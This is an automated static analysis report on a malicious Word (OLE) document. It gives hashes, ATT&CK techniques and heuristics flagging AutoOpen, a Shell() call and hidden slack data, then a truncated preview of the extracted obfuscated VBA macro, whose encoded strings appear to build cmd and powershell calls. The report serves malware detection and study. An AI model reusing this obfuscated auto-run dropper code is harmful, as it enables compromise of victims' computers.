Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bb93b3cd6df5400…

MALICIOUS

Office (OLE)

172.5 KB Created: 2018-04-26 19:45:00 Authoring application: Microsoft Office Word First seen: 2019-10-29
MD5: 0b46e5d21fd5c1015c4f64fcf1048407 SHA-1: 312ad75456d415e8c457e5a774812dfac4592fc6 SHA-256: 6bb93b3cd6df5400399498c3b0f9b13712716182c81e25ae3cd088fea93982c9
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing legacy WordBasic and Excel 4.0 macro markers, along with significant VBA macros. The critical heuristic firing indicates a Shell() call within the VBA, suggesting the macro attempts to execute arbitrary commands. The obfuscated nature of the VBA code implies it is designed to download and run a secondary payload, a common tactic for initial compromise.

Heuristics 7

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 176,640 bytes but its declared streams total only 27,227 bytes — 149,413 bytes (85%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 58224 bytes
SHA-256: 59328089f00ef9d2977a033d17b613f397d4dd71a618d2b17183fdaf1cadbd1c
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "rPYOowbT"
Function LCFaIORsGTpzr()
On Error Resume Next
Select Case iQIaO
         Case 76642
            qUSbMi = ociSb
            BbThZR = Round(18503)
            orWdL = Hex(WBtRC - ChrW(WmjYUF))
            ivtQK = mzDwbB
         Case 94661
            TBdwwA = CByte(49077)
            njQPcL = Log(rvMTt)
End Select
GwYGVEpNl = icqQH("@A4k dmMB", KstoL - KstoL + 3 + KstoL - KstoL, KstoL - KstoL + 3 + KstoL - KstoL)
Select Case ZuaLdZ
         Case 18208
            ESQEU = kGcWE
            qIKAuX = Round(50477)
            MBPhED = Hex(HCkUbQ - ChrW(iRAKH))
            dlTpO = kRjaQG
         Case 98630
            GDCiA = CByte(32595)
            dDrCd = Log(RZtAkP)
End Select
Select Case VUwKrG
         Case 35197
            KmOsh = zzXYjQ
            QLluh = Round(14074)
            BMnBlz = Hex(fnXLhE - ChrW(QBvsTY))
            TWhVja = JLPJz
         Case 75073
            zwMGi = CByte(36197)
            KANBM = Log(AJpCOi)
End Select
JLMNt = icqQH(",@a8z^p^S^mnP8N", HbiZS - HbiZS + 5 + HbiZS - HbiZS, HbiZS - HbiZS + 6 + HbiZS - HbiZS)
Select Case hqFjCY
         Case 43048
            bHCiR = TCill
            iIVTU = Round(44289)
            FzVNuQ = Hex(jHtjE - ChrW(wvisL))
            uNhHH = ddEYU
         Case 72650
            fcRVF = CByte(89194)
            SNjLJ = Log(hbJiZ)
End Select
Select Case OURDw
         Case 94269
            aGqNB = YKGnq
            jjZNlR = Round(56080)
            XlGrM = Hex(dqfiB - ChrW(wjnKb))
            HjFwQ = vMBSo
         Case 13621
            lTZBoA = CByte(97416)
            qjifb = Log(jnzvPm)
End Select
SXspkTjrh = icqQH("5q2^o^c^%  z4@GZm", IAcjYs - IAcjYs + 7 + IAcjYs - IAcjYs, IAcjYs - IAcjYs + 8 + IAcjYs - IAcjYs)
Select Case JuSZV
         Case 10900
            AJLBYz = nWiwK
            ORzWTo = Round(28335)
            YBWZV = Hex(cZHcT - ChrW(CAjXhG))
            WwQRwF = GruvF
         Case 62878
            kbHobD = CByte(74096)
            OPGfPa = Log(lcpMK)
End Select
Select Case wwbYda
         Case 5763
            YWjCom = wFcOV
            VwGcH = Round(18358)
            LZkzJi = Hex(IzkBCJ - ChrW(pkuOQL))
            DNWzoF = BVwWRS
         Case 65850
            llsJDF = CByte(676)
            aLLpj = Log(LNqzt)
End Select
QjRLczPGJj = icqQH("425zXvBTqiuAjtttzJbjZ", PHkaUM - PHkaUM + 2 + PHkaUM - PHkaUM, PHkaUM - PHkaUM + 12 + PHkaUM - PHkaUM)
Select Case LNAVZ
         Case 10694
            coflr = qzIWH
            lCswm = Round(55897)
            wpJif = Hex(YZmXl - ChrW(jwzXj))
            ZUnpMD = ipIFSR
         Case 26441
            JIQTGA = CByte(34707)
            bEbXz = Log(JmiMB)
End Select
Select Case XNMRAT
         Case 15579
            cSjumO = rGNWf
            ZFjIia = Round(31039)
            GLUduc = Hex(kdtti - ChrW(SaGAF))
            Zbtrij = zIfIS
         Case 87153
            LVGMRs = CByte(74147)
            GdUczD = Log(fZIcd)
End Select
OihIMuo = icqQH("zPPAL          i", IbGdG - IbGdG + 2 + IbGdG - IbGdG, IbGdG - IbGdG + 10 + IbGdG - IbGdG)
Select Case JNTptq
         Case 59211
            FUbAq = wTuiN
            jVQWB = Round(74013)
            qdFAqP = Hex(CImXX - ChrW(HcBIt))
            GqKLfZ = TJnzz
         Case 75831
            ronAU = CByte(71004)
            oLojWL = Log(CEUHd)
End Select
Select Case toVUBi
         Case 81897
            VwjND = kJjlLK
            GURGZ = Round(45138)
            saWfsv = Hex(zvqXv - ChrW(uzYpbY))
            jRKNq = hmUEO
         Case 52755
            uIvbB = CByte(39903)
            imOsO = Log(OHHvc)
End Select
ZsUiozfz = icqQH("kKP   %^c^E^p^Szn", fJjRZ - fJjRZ + 4 + fJjRZ - fJjRZ, fJjRZ - fJjRZ + 11 + fJjRZ - fJjRZ)
Select Case BKMaPJ
         Case 78530
            Odcqcv = BlEzoG
            iwDRz = Round(51036)
            ZfYcja = Hex(ihfRM - ChrW(tFKXPS))
            NVDwoY = jQXwKO
         Case 71674
            zDOtVj = CByte(36269)
            YfbTW = Log(mjBju)
End Select
Select Case w
... (truncated)